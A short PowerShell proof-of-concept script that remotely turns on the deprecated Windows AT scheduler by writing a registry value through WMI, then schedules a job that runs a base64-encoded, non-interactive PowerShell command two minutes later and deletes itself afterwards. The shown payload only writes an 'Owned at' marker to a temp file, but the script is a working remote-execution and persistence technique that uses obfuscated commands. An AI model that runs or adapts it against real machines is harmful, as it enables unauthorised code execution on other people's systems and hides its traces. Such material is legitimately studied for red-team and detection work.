# This code could be used to remotely enable and launch AT jobs regardless of th

1. # This code could be used to remotely enable and launch AT jobs regardless of the fact that AT is deprecated in Win8+.
2.  
3. $HKLM = [UInt32] 2147483650
4.  
5. # Check to see if EnableAt is set
6. $Result = Invoke-CimMethod -Namespace root/default -ClassName StdRegProv -MethodName GetDWORDValue -Arguments @{
7. hDefKey = $HKLM
8. sSubKeyName = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration'
9. sValueName = 'EnableAt'
10. }
11.  
12. # If EnableAt is not set, set it
13. if ($Result.ReturnValue -ne 0) {
14. $Result = Invoke-CimMethod -Namespace root/default -ClassName StdRegProv -MethodName SetDWORDValue -Arguments @{
15. hDefKey = $HKLM
16. sSubKeyName = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration'
17. sValueName = 'EnableAt'
18. uValue = [UInt32] 1
19. }
20.  
21. $Result
22. }
23.  
24. # At this point, you'll need to wait for a reboot
25.  
26. # "Owned at $(Get-Date)" | Out-File "$($Env:TEMP)\payload.txt" -Append
27. $EncodedCommand = 'powershell.exe -noni -nop -enc IgBPAHcAbgBlAGQAIABhAHQAIAAkACgARwBlAHQALQBEAGEAdABlACkAIgAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAiACQAKAAkAEUAbgB2ADoAVABFAE0AUAApAFwAcABhAHkAbABvAGEAZAAuAHQAeAB0ACIAIAAtAEEAcABwAGUAbgBkAA=='
28.  
29. Invoke-CimMethod -ClassName Win32_ScheduledJob -MethodName Create -Arguments @{
30. Command = $EncodedCommand
31. StartTime = (Get-Date).AddMinutes(2) # Execute two minutes from now
32. }
33.  
34. # The AT job will delete itself after it executes.